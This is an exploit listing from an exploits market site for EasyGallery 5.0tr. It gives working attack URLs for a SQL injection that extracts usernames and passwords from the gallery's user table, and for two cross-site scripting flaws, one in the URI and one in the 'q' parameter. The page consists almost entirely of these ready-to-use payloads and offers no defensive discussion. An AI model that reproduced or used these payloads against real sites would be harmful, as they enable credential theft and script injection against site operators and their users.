[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EasyGallery <= 5.0tr Multiple Remote Vulnerabilities

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2737
Category
web applications
Date add
12-03-2008
Platform
unsorted
====================================================
EasyGallery <= 5.0tr Multiple Remote Vulnerabilities
====================================================



                    [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: EasyGallery
[~] HomePage: http://myiosoft.com
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Verified in localhost with EasyGallery 5.0tr and magic_quotes Off

[+] Remote SQL Injection:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/*

[+] Cross Site Scripting in URI:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS]
[~] Example: >"><ScRiPt>alert("JosS)</ScRiPt>

[+] Cross Site Scripting:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS]
[~] Example: %22+onmouseover=alert("JosS")+



#  0day.today [2024-12-24]  #